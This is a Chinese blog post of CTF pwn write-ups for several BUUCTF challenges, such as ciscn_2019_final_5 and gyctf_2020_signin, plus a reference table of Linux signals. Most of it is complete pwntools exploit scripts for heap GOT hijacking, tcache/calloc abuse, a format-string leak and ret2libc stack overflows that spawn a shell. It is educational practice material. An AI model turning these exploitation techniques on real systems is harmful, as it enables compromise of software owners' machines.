buuctf ciscn_2019_final_5 calloc整理机制修改tcache的fd puts \0泄漏 signal信号

最新推荐文章于 2022-12-01 16:09:33 发布
最新推荐文章于 2022-12-01 16:09:33 发布
阅读量569 收藏 1
点赞数
分类专栏: CTF PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/carol2358/article/details/107857962
版权
CTF 同时被 2 个专栏收录
27 篇文章 3 订阅
订阅专栏
PWN
24 篇文章 1 订阅
订阅专栏

文章目录

ciscn_2019_final_5

有趣的题目
涉及位级操作
在这里插入图片描述
漏洞的关键是index为16时,二进制为1 0000
edit
在这里插入图片描述
他们都是认heap_ptr里最后一个16进制来判断他是index几的,index1最后一位就是1,2就是2,8就是8,4就是4,但问题是他存储是按照你申请的顺序存的,和这个index没啥关系,漏洞就来了

这题很明显是要你改got表
没有show,就把free改成puts来泄漏
exp:

from pwn import *
from LibcSearcher import * 

local_file  = './ciscn_final_5'
local_libc  = '/root/glibc-all-in-one/libs/2.27/libc-2.27.so'
remote_libc = '/root/glibc-all-in-one/libs/2.27/libc-2.27.so'
 
 
select = 1

if select == 0:
    r = process(local_file)
    libc = ELF(local_libc)
else:
    r = remote('node3.buuoj.cn', 25581)
    libc = ELF(remote_libc)

elf = ELF(local_file)

context.log_level = 'debug'
context.arch = elf.arch

se      = lambda data               :r.send(data) 
sa      = lambda delim,data         :r.sendafter(delim, data)
sl      = lambda data               :r.sendline(data)
sla     = lambda delim,data         :r.sendlineafter(delim, data)
sea     = lambda delim,data         :r.sendafter(delim, data)
rc      = lambda numb=4096          :r.recv(numb)
rl      = lambda                    :r.recvline()
ru      = lambda delims 			:r.recvuntil(delims)
uu32    = lambda data               :u32(data.ljust(4, '\0'))
uu64    = lambda data               :u64(data.ljust(8, '\0'))
info    = lambda tag, addr        :r.info(tag + ': {:#x}'.format(addr))
o_g = [0x4f2c5, 0x4f322, 0x10a38c]
def debug(cmd=''):
     gdb.attach(r,cmd)
def menu(choice):
    sea('your choice: ', str(choice))
def add(index, size, content):
    menu(1)
    sea('index: ', str(index))
    sea('size: ', str(size))
    sea('content:', content)
def free(index):
    menu(2)
    sea('index: ', str(index))
def edit(index, content):
    menu(3)
    sea('index: ', str(index))
    sea('content: ', content)
free_got = elf.got['free']
puts_got = elf.got['puts']
atoi_got = elf.got['atoi']
puts_plt = elf.plt['puts']
add(16,0x10,p64(0)+p64(0x90))
#在这里伪造一个size,因为index16,他会把这个size当做chunk0来free,这样size就错乱了
add(1, 0xc0, 'aa\n')
free(0)
free(1)
add(2, 0x80, p64(0)+p64(0x21)+p64(0x6020E0))
#用到了前面0x90
add(3, 0xc0, 'aaa\n')
add(4, 0xc0, p64(free_got)+p64(puts_got+1)+p64(atoi_got-4)+p64(0)*17+p32(0x10)*8)
#+1 -4都是为了迎合index
edit(8,p64(puts_plt)*2)
#为什么是8?因为free_got末尾是8,会判断为index8
free(1)
#拿到puts的libc
libc_base = uu64(ru('\x7f')[-6:]) - libc.sym['puts']
info('libc_base', libc_base)
system = libc_base + libc.sym['system']
edit(4, p64(system)*2)
#改atoi为system
sl('/bin/sh\x00')
r.interactive()

gyctf_2020_signin

calloc有以下几个特性:
分配前会进行清0
不会分配tcache中的chunk
在分配fastbin中的chunk时若还有其他大小相同的fastbin_chunk则把它们全部放入tcache中

本题的后门只要ptr不为0就可以触发,并且后门前有个calloc,那就可以利用整理机制来进行填充
并且这题有uaf的漏洞
在这里插入图片描述

exp:

from pwn import *
from LibcSearcher import * 

local_file  = './gyctf_2020_signin'
local_libc  = '/root/glibc-all-in-one/libs/2.27/libc-2.27.so'
remote_libc = '/root/glibc-all-in-one/libs/2.27/libc-2.27.so'
 
 
select = 0

if select == 0:
    r = process(local_file)
    libc = ELF(local_libc)
else:
    r = remote('', )
    libc = ELF(remote_libc)

elf = ELF(local_file)

context.log_level = 'debug'
context.arch = elf.arch

se      = lambda data               :r.send(data) 
sa      = lambda delim,data         :r.sendafter(delim, data)
sl      = lambda data               :r.sendline(data)
sla     = lambda delim,data         :r.sendlineafter(delim, data)
sea     = lambda delim,data         :r.sendafter(delim, data)
rc      = lambda numb=4096          :r.recv(numb)
rl      = lambda                    :r.recvline()
ru      = lambda delims 			:r.recvuntil(delims)
uu32    = lambda data               :u32(data.ljust(4, '\0'))
uu64    = lambda data               :u64(data.ljust(8, '\0'))
info    = lambda tag, addr        :r.info(tag + ': {:#x}'.format(addr))

def debug(cmd=''):
     gdb.attach(r,cmd)
def add(index):
    r.sendlineafter('your choice?', '1')
    r.sendlineafter('idx?\n', str(index))

def edit(index, content):
    r.sendlineafter('your choice?', '2')
    r.sendlineafter('idx?\n', str(index))
    r.send(content)

def free(index):
    r.sendlineafter('your choice?', '3')
    r.sendlineafter('idx?\n', str(index))
flags = 0x404160
ptr = 0x4040C0
for i in range(8):
    add(i)
for i in range(8):
    free(i)
add(8)
p = p64(0x4040c0-0x10).ljust(0x50, '\x00')
edit(7, p)

#debug()
sl('6')

r.interactive()

judgement_mna_2016

简单的格式化字符串
exp:

from pwn import *
from LibcSearcher import * 

local_file  = './judgement_mna_2016'
local_libc  = '/usr/lib/x86_64-linux-gnu/libc-2.29.so'
remote_libc = '/usr/lib/x86_64-linux-gnu/libc-2.29.so'
 
 
select = 1

if select == 0:
    r = process(local_file)
    #libc = ELF(local_libc)
else:
    r = remote('node3.buuoj.cn', 25192)
    #libc = ELF(remote_libc)

elf = ELF(local_file)

context.log_level = 'debug'
context.arch = elf.arch

se      = lambda data               :r.send(data) 
sa      = lambda delim,data         :r.sendafter(delim, data)
sl      = lambda data               :r.sendline(data)
sla     = lambda delim,data         :r.sendlineafter(delim, data)
sea     = lambda delim,data         :r.sendafter(delim, data)
rc      = lambda numb=4096          :r.recv(numb)
rl      = lambda                    :r.recvline()
ru      = lambda delims 			:r.recvuntil(delims)
uu32    = lambda data               :u32(data.ljust(4, '\0'))
uu64    = lambda data               :u64(data.ljust(8, '\0'))
info    = lambda tag, addr        :r.info(tag + ': {:#x}'.format(addr))

def debug(cmd=''):
     gdb.attach(r,cmd)

sl('%32$s')

r.interactive()

picoctf_2018_leak_me

利用stack的相连,然后puts遇到\x00才会截断,来leak
fgets和gets都会末尾+\0
exp:

from pwn import *
from LibcSearcher import * 

local_file  = './PicoCTF_2018_leak-me'
local_libc  = '/usr/lib/x86_64-linux-gnu/libc-2.29.so'
remote_libc = '/usr/lib/x86_64-linux-gnu/libc-2.29.so'
 
 
select = 0

if select == 0:
    r = process(local_file)
    #libc = ELF(local_libc)
else:
    r = remote('node3.buuoj.cn', 28300)
    #libc = ELF(remote_libc)

elf = ELF(local_file)

context.log_level = 'debug'
context.arch = elf.arch

se      = lambda data               :r.send(data) 
sa      = lambda delim,data         :r.sendafter(delim, data)
sl      = lambda data               :r.sendline(data)
sla     = lambda delim,data         :r.sendlineafter(delim, data)
sea     = lambda delim,data         :r.sendafter(delim, data)
rc      = lambda numb=4096          :r.recv(numb)
rl      = lambda                    :r.recvline()
ru      = lambda delims 			:r.recvuntil(delims)
uu32    = lambda data               :u32(data.ljust(4, '\0'))
uu64    = lambda data               :u64(data.ljust(8, '\0'))
info    = lambda tag, addr        :r.info(tag + ': {:#x}'.format(addr))

def debug(cmd=''):
     gdb.attach(r,cmd)
sl('a'*250)
ru('Plea')
passwd = rl()
print "passwd:\t"+passwd
sl(str(passwd))

r.interactive()

picoctf_2018_buffer overflow 0

两种方法,一种是触发内存错误11,来获得flag
第二种是栈溢出,puts flag
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

  1. SIGHUP 2) SIGINT 3) SIGQUIT 4) SIGILL 5) SIGTRAP
  2. SIGABRT 7) SIGBUS 8) SIGFPE 9) SIGKILL 10) SIGUSR1
  3. SIGSEGV 12) SIGUSR2 13) SIGPIPE 14) SIGALRM 15) SIGTERM
  4. SIGSTKFLT 17) SIGCHLD 18) SIGCONT 19) SIGSTOP 20) SIGTSTP
  5. SIGTTIN 22) SIGTTOU 23) SIGURG 24) SIGXCPU 25) SIGXFSZ
  6. SIGVTALRM 27) SIGPROF 28) SIGWINCH 29) SIGIO 30) SIGPWR
  7. SIGSYS 34) SIGRTMIN 35) SIGRTMIN+1 36) SIGRTMIN+2 37) SIGRTMIN+3
  8. SIGRTMIN+4 39) SIGRTMIN+5 40) SIGRTMIN+6 41) SIGRTMIN+7 42) SIGRTMIN+8
  9. SIGRTMIN+9 44) SIGRTMIN+10 45) SIGRTMIN+11 46) SIGRTMIN+12 47) SIGRTMIN+13
  10. SIGRTMIN+14 49) SIGRTMIN+15 50) SIGRTMAX-14 51) SIGRTMAX-13 52) SIGRTMAX-12
  11. SIGRTMAX-11 54) SIGRTMAX-10 55) SIGRTMAX-9 56) SIGRTMAX-8 57) SIGRTMAX-7
  12. SIGRTMAX-6 59) SIGRTMAX-5 60) SIGRTMAX-4 61) SIGRTMAX-3 62) SIGRTMAX-2
  13. SIGRTMAX-1 64) SIGRTMAX

Signal Description
SIGABRT 由调用abort函数产生,进程非正常退出
SIGALRM 用alarm函数设置的timer超时或setitimer函数设置的interval timer超时
SIGBUS 某种特定的硬件异常,通常由内存访问引起
SIGCANCEL 由Solaris Thread Library内部使用,通常不会使用
SIGCHLD 进程Terminate或Stop的时候,SIGCHLD会发送给它的父进程。缺省情况下该Signal会被忽略
SIGCONT 当被stop的进程恢复运行的时候,自动发送
SIGEMT 和实现相关的硬件异常
SIGFPE 数学相关的异常,如被0除,浮点溢出,等等
SIGFREEZE Solaris专用,Hiberate或者Suspended时候发送
SIGHUP 发送给具有Terminal的Controlling Process,当terminal被disconnect时候发送
SIGILL 非法指令异常
SIGINFO BSD signal。由Status Key产生,通常是CTRL+T。发送给所有Foreground Group的进程
SIGINT 由Interrupt Key产生,通常是CTRL+C或者DELETE。发送给所有ForeGround Group的进程
SIGIO 异步IO事件
SIGIOT 实现相关的硬件异常,一般对应SIGABRT
SIGKILL 无法处理和忽略。中止某个进程
SIGLWP 由Solaris Thread Libray内部使用
SIGPIPE 在reader中止之后写Pipe的时候发送
SIGPOLL 当某个事件发送给Pollable Device的时候发送
SIGPROF Setitimer指定的Profiling Interval Timer所产生
SIGPWR 和系统相关。和UPS相关。
SIGQUIT 输入Quit Key的时候(CTRL+\)发送给所有Foreground Group的进程
SIGSEGV 非法内存访问
SIGSTKFLT Linux专用,数学协处理器的栈异常
SIGSTOP 中止进程。无法处理和忽略。
SIGSYS 非法系统调用
SIGTERM 请求中止进程,kill命令缺省发送
SIGTHAW Solaris专用,从Suspend恢复时候发送
SIGTRAP 实现相关的硬件异常。一般是调试异常
SIGTSTP Suspend Key,一般是Ctrl+Z。发送给所有Foreground Group的进程
SIGTTIN 当Background Group的进程尝试读取Terminal的时候发送
SIGTTOU 当Background Group的进程尝试写Terminal的时候发送
SIGURG 当out-of-band data接收的时候可能发送
SIGUSR1 用户自定义signal 1
SIGUSR2 用户自定义signal 2
SIGVTALRM setitimer函数设置的Virtual Interval Timer超时的时候
SIGWAITING Solaris Thread Library内部实现专用
SIGWINCH 当Terminal的窗口大小改变的时候,发送给Foreground Group的所有进程
SIGXCPU 当CPU时间限制超时的时候
SIGXFSZ 进程超过文件大小限制
SIGXRES Solaris专用,进程超过资源限制的时候发送
在这里插入图片描述

在这里插入图片描述

from pwn import *

elf = ELF('./vuln')
p = 'a'*0x18+'b'*4+p32(elf.plt['puts'])+p32(0x0804A080)
print p
r = process(argv=["./vuln" , p])
r.interactive()

cmcc_pwnme1

由于buu没有/home的环境,所以后门无法利用
exp:

from pwn import *
from LibcSearcher import * 

local_file  = './pwnme1'
local_libc  = '/usr/lib/x86_64-linux-gnu/libc-2.29.so'
remote_libc = '/usr/lib/x86_64-linux-gnu/libc-2.29.so'
 
 
select = 1

if select == 0:
    r = process(local_file)
    #libc = ELF(local_libc)
else:
    r = remote('node3.buuoj.cn',26689)
    #libc = ELF(remote_libc)

elf = ELF(local_file)

context.log_level = 'debug'
context.arch = elf.arch

se      = lambda data               :r.send(data) 
sa      = lambda delim,data         :r.sendafter(delim, data)
sl      = lambda data               :r.sendline(data)
sla     = lambda delim,data         :r.sendlineafter(delim, data)
sea     = lambda delim,data         :r.sendafter(delim, data)
rc      = lambda numb=4096          :r.recv(numb)
rl      = lambda                    :r.recvline()
ru      = lambda delims 			:r.recvuntil(delims)
uu32    = lambda data               :u32(data.ljust(4, '\0'))
uu64    = lambda data               :u64(data.ljust(8, '\0'))
info    = lambda tag, addr        :r.info(tag + ': {:#x}'.format(addr))

def debug(cmd=''):
     gdb.attach(r,cmd)
'''
flag = 0x8048677
p = 'a'*0xa4+'b'*4+p32(flag)
sl('5')
sla('Please input the name of fruit:',p)
'''

fun_got = elf.got['puts']
fun_plt = elf.plt['puts']
main = elf.sym['main']

p1 = flat(['a'*0xa4, 'b'*4, fun_plt, main, fun_got])
sl('5')
sl(p1)
#log.info(rl())
fun_addr = uu32(ru('\xf7')[-4:])
#fun_addr = uu32(rc(4))
info('fun_addr', fun_addr)

libc = LibcSearcher('puts', fun_addr)
libcbase = fun_addr - libc.dump('puts')
system_addr = libcbase + libc.dump('system')
binsh_addr = libcbase + libc.dump('str_bin_sh')

p2 = flat(['a'*0xa4, 'b'*4, system_addr, 'b'*4, binsh_addr])
sl('5')
sl(p2)


r.interactive()
真岛忍
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF-PWN ciscn_2019_final_5(临界条件错误,劫持GOT项)
weixin_44145820的博客
04-14 965
目录题目分析漏洞分析漏洞利用Exp 题目分析 例行安全检查 没有PIE,方面调试 partial relro意味着这题应该直接GOT就能做 菜单: 没有show功能,可以考虑吧某个函数(比如free的GOT为puts@plt 可以申请17个chunk,编号为0-16 每次分配结束后会显示分配内存的低12bits 而本题中还有一个特殊的地方,就是content数组(0x6020e0)...
Pwn-Ciscn_2019_Final
fayinq的博客
03-11 359
Ciscn_2019_Final 感觉是一道很好的堆题,使用了很多技巧以及做题思路,包括了uaf,_IO_2_1_stdin,double_free,还有 _IO_2_1_stdin_fileno,这些技巧。 IDA分析: main函数: init函数: 沙箱:(少截取一点为无所谓) allocate函数: 这里面每次无论add了int还是short int 都会把bool修改成1。 delete函数: ​ del有一段特殊判定,就是bool的判定,因为bool的存在,导致了没有办法连续释放i
pwnme1题目
09-30
pwnme1的题目,这个是一个简单的栈溢出的题目
C语言动态内存分配的详解
12-31
C语言动态内存分配的详解 1.为什么使用动态内存分配 数组在使用的时候可能造成内存浪费,使用动态内存分配可以解决这个问题。 2. malloc和free C函数库提供了两个函数,malloc和free,分别用于执行动态内存分配和释放。 (1)void *malloc(size_t size); malloc的参数就是需要分配的内存字节数。malloc分配一块连续的内存。如果操作系统无法向malloc提供更多的内存,malloc就返回一个NULL指针。 (2)void free(void *pointer); free的参数要么是NULL,要么是一个先前从malloc、calloc或reall
school21_projects
04-21
school21_projects 这是我在我的资料库中上传在21世纪学校所做的项目的地方。 随着我在学校课程中的进展,该资料库得到了补充。 Libft-我的第一个学生项目21。在这里,我实现了一些功能,还编写了一个makefile将它们收集到库中。 必填部分: ___`int FT_ATOI(char * str)`___。 该函数将“ str”指向的字符串的初始部分转换为整数。 ___`void FT_BZERO(void * s,size_t n)`___。 该函数将字节区域中从“ s”开始的前“ n”个字节设置为零。 ___`void * FT_CALLOC(size_t count,size_t size)___。 该函数为每个“大小”字节的“计数”元素数组分配内存,并返回指向已分配内存的指针。 内存设置为零。 如果count或size为___0___,则callo
debug_new:C / C ++一切内存调试器-开源
04-26
警告:较旧的项目可能必须使用-DDEBUG_NEW_CONFIG_HAVE_DEPRECATED进行编译。Debug_New提供了调试内存泄漏的可能性,不仅可以(请注意“ not only”;这只是其功能之一)在一种方式,但是使用内存状态来实现。 -跨平台+跨编译器支持(仅针对c ++使用预处理器和模板-voodoo-magic)-支持C和C ++-支持gcc和g ++-支持pthread和任何posix平台-支持多线程。 -易于使用和安装(只需包含标题并链接源代码)。 -轻松调试内存泄漏。 -轻松调试悬空指针。 -轻松调试解除分配方法的正确性。 -轻松调试数组索引错误(写到末尾时)。 -轻松配置内存使用情况并跟踪内存信息。 -对Visual Studio的点击即转到源支持。 -对new,new [],delete,delete [],malloc,calloc,realloc,free的集成兼容性
pwnme2题目
10-14
cmcc搞的ctf的pwnme2题目的文件,感兴趣的同学可以下载来玩玩
ciscn_2019_final_5
z1r0的博客
02-28 226
ciscn_2019_final_5 查看保护 当index为16的时候,经过运算保存的地址为0x20其实也就是heap的初初始地址+0x20。一开始没怎么看懂这些逻辑然后看了一下ha1vk的wp就懂了(XD 攻击思路:因为16的时候在堆的+0x20,所以只需要在堆里伪造一个堆块,然后释放再申请就可以下面的一些堆块,把下面的堆块释放掉之后通过伪造的堆来他们的fd达到任意地址申请即可。具体的tcache dup看z1r0’s blog from pwn import * context(arch=
ciscn_2019_final_5(临界条件错误,劫持GOT)
m0_51251108的博客
11-11 601
ciscn_2019_final_5: got可写,pie没开 程序分析: 主界面: add函数: delete函数: 由于一般地址都会16位对齐,这里的free用按位与取前15位,最后一位为0 其实也没啥问题 edit函数: 和delete,都是取最后一位为下标 漏洞分析: 漏洞出现在add函数里的index我们能取0x10,即(0001 0000) 而它如果与倒数第五位为0的heap_ptr按位与的话会导致存进heap_list的地址变大0x10 例:我们申请第一个堆的地址最后三位一般为0x
4.13做题随记(axb_2019_heap, ciscn_2019_final_5)
eeeeeight的博客
04-14 167
4.13做题随记 Column: Apr 14, 2021 Tags: Pwn 相关文件链接 axb_2019_heap ciscn_2019_final_5 axb_2019_heap: 保护检查: 利用思路: banner()中存在明显的格式化字符串漏洞, 因此可以用来泄露栈地址, libc地址以及pie产生的偏移 get_input()中有单字节溢出, 可以修改下一个chunk的inuse位, 从而unlink 因此只要获得偏移后unlink到&note任意读写到malloc_hook, 写
FT_PRINTF-2021
04-02
FT_PRINTF-2021 const comme论点 :OK_hand: 自由之记忆 :OK_hand: Si calloc / malloc失败,返回true Enlever les strlen dans les而三.h :OK_hand: Ajouter Mendel Dans Lift(前拉式) 充分发挥所有印刷品的作用 :...
my_gperftools-2.0.tar.gz
09-19
修改src/base/linuxthreads.cc static void SignalHandler(int signum, siginfo_t *si, void *data) 其中 siginfo_t *si 成 siginfo *si echo "please modify the src/debugallocation.cc" echo " DEFINE_bool...
内存问题OOM
weixin_45157020的博客
12-01 1197
OOM,是的缩写,指的是 App 占用的内存达到了 iOS 系统对单个 App 占用内存上限后,而被系统强杀掉的现象。这么说的话,OOM 其实也属于文章中提到的应用“崩溃”中的一种,是由 iOS 的 Jetsam 机制导致的一种“另类”崩溃,并且日志无法通过信号捕捉到。JetSam 机制,指的就是操作系统为了控制内存资源过度使用而采用的一种资源管控机制。我们都知道,物理内存和 CPU 对于手机这样的便携设备来说,可谓稀缺资源。所以说,在 iOS 系统的虚拟内存管理中,内存压力的管控就是一项很重要的内容。
calloc with tcache&&gyctf_2020_signin
azraelxuemo的博客
03-25 962
文章目录gyctf_2020_signin分析add函数deleteeditbackdoor思路__libc_callo_int_malloc回到题目 今天做了一道题目,利用了glibc-2.27里面的一个新机制,感觉自己对于glibc-2.23和glibc-2.27的区别还不是很明确,那么我们来比对一下这两个版本的一些函数 一直有这样的一种思维嘛,对于glibc2.27来说,释放的内存会先进入tcache,如果大小合适会从tcache里面优先分配,我们来看看原因 上图是__libc_malloc里面的执
gyctf_2020_signin(calloc特性,uaf,tcache特性)
m0_51251108的博客
11-04 462
gyctf_2020_signin: 参考师傅:yongbaoii 逆向分析: 主界面: 三个功能,add,edit,free,还有个backdoor add函数: edit函数: free函数: 有个标记检查,doublefree不能用了 backdoor: 还有个calloc函数 这里分配一个0x70大小的chunk calloc 有以下特性 不会分配 tcache chunk 中的 chunk 。 tcache 有以下特性 在分配 fastbin 中的 chunk 时若还有其他相同大
CTF wiki srop 学习记录
m0_57754423的博客
03-04 333
参考wiki,hollk师傅博客。 说一下我的个人理解,当题目中没有足够的gadget ,可以直接或者间接控制rax,题目中有syscall就可以利用这种攻击手法。 srop: 在unix系统发生signal的时候会执行sigreturn 系统调用。 signal机制signal 机制是类 unix 系统中进程之间相互传递信息的一种方法。一般,我们也称其为软中断信号,或者软中断。比如说,进程之间可以通过系统调用 kill 来发送软中断信号。 介绍: 1.内核向某个程序中发送signal机制
ciscn_final_5
seaaseesa的博客
04-09 412
ciscn_final_5 首先,检查一下程序的保护机制 然后,我们用IDA分析一下 程序将下标存储到了堆地址的低4位里 操作的时候再清除低4位地址值。 问题就在于当index为16的时候,低4位已经无法示了,这就造成了溢出 假如我的堆地址为0x10,我的index为16,那么,经过运算,保存的地址为0x20,这样free的时候,就是free(0x20)。因此,我...
i春秋新春战役PWN之signin(calloc不从tcache里取chunk)
seaaseesa的博客
02-26 1313
Signin(calloc不从tcache里取chunk) 首先,检查一下程序的保护机制 然后,我们用IDA分析一下,存在一个后门函数,要执行后面函数,需要ptr不为0 Delete功能没有清空指针 Edit功能存在UAF漏洞,但edit功能只能使用一次 测试出题目给我们的glibc版本为2.29,存在tcahce机制。 由于edit功能只用一次。同时,我们注...
【八芒星计划】 ORW
carol2358的博客
09-01 3900
本篇用来记录ORW,ORW可以分为2.27以下的orw和2.29以上的orw,如果是本地请自备flag文件 orw技术是用来应对沙盒的 文章目录oooorder2019-BALSN-CTF-plaintext oooorder 本题是2.27的orw,漏洞是uaf,漏洞在这里不展开讲,uaf也并不难 2.27的orw既可以使用heap_addr,也可以不要,先讲不需要heap_addr的,毕竟能少泄漏就少泄漏 最重要的是使用了setcontext这个函数,来达成我们控制寄存器的目的 2.27得setcont
grub_calloc
最新发布
05-27
它类似于 C 标准库中的 `calloc` 函数,但是它还会在分配的内存块的开头填充 0 值。这个函数的原型如下: ```c void *grub_calloc (grub_size_t nmemb, grub_size_t size); ``` 其中 `nmemb` 示需要分配的块数,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值